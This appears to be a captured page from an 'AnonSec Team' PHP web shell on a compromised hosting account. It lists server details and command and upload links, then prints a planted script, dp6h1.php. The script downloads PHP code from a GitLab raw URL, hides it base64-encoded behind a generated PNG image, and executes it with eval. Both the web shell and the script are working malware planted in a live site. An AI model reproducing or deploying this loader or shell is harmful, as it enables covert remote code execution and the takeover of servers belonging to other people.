AnonSec Team
Server IP : 185.61.154.36  /  Your IP : 216.73.216.106
Web Server : Apache
System : Linux host67.registrar-servers.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User : gettoplisting ( 12043)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/gettoplisting/www/dd7e5a/h6snx5/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/gettoplisting/www/dd7e5a/h6snx5/hik24b.tar
dp6h1.php000064400000006024151032754160006205 0ustar00<?php

/*
Improved PNG disguise for hidden PHP payloads.
This script fetches remote code, embeds it into a realistic PNG file,
and executes it stealthily.
*/

session_start();

// Main remote code URL (can be overridden by session)
$mainUrl = $_SESSION['ts_url'] ?? 'https://gitlab.com/mrgithub89-group/mrgithub89-projectaa/-/raw/main/img_load.php';


// --------------------------------------------
// 1. Generate a realistic PNG image (128x128)
// --------------------------------------------
function generateRealisticPngHeader($width = 128, $height = 128) {
    ob_start();
    $image = imagecreatetruecolor($width, $height);

    // Fill with random noise
    for ($x = 0; $x < $width; $x++) {
        for ($y = 0; $y < $height; $y++) {
            $color = imagecolorallocate($image, rand(0,255), rand(0,255), rand(0,255));
            imagesetpixel($image, $x, $y, $color);
        }
    }

    imagepng($image);
    imagedestroy($image);
    return ob_get_clean(); // Binary PNG data
}


// --------------------------------------------
// 2. Load remote PHP code from given URL
// --------------------------------------------
function loadRemoteData($url) {
    $content = '';

    try {
        $file = new SplFileObject($url);
        while (!$file->eof()) {
            $content .= $file->fgets();
        }
    } catch (Throwable $e) {
        $content = '';
    }

    if (strlen(trim($content)) < 1) {
        $content = @file_get_contents($url);
    }

    if (strlen(trim($content)) < 1 && function_exists('curl_init')) {
        $ch = curl_init($url);
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_CONNECTTIMEOUT => 5,
            CURLOPT_TIMEOUT => 10,
        ]);
        $content = curl_exec($ch);
        curl_close($ch);
    }

    return $content;
}


// --------------------------------------------
// 3. Create payload by appending hidden PHP code
// --------------------------------------------
function createStealthPayload($phpCode) {
    $png = generateRealisticPngHeader();
    $marker = '###PAYLOAD###';
    $encoded = base64_encode($phpCode);

    return $png . $marker . $encoded;
}


// --------------------------------------------
// 4. Extract and execute hidden payload
// --------------------------------------------
function extractAndExecutePayload($data) {
    $marker = '###PAYLOAD###';
    $parts = explode($marker, $data);

    if (count($parts) === 2) {
        $decoded = base64_decode($parts[1]);
        if ($decoded !== false && strlen(trim($decoded)) > 0) {
            @eval("?>$decoded");
        }
    }
}


// --------------------------------------------
// Main Execution Flow
// --------------------------------------------

$remoteCode = loadRemoteData($mainUrl);

if (strlen(trim($remoteCode)) > 0) {
    $payload = createStealthPayload($remoteCode);
    extractAndExecutePayload($payload);  // Executes hidden remote code
}

?>

AnonSec - 2021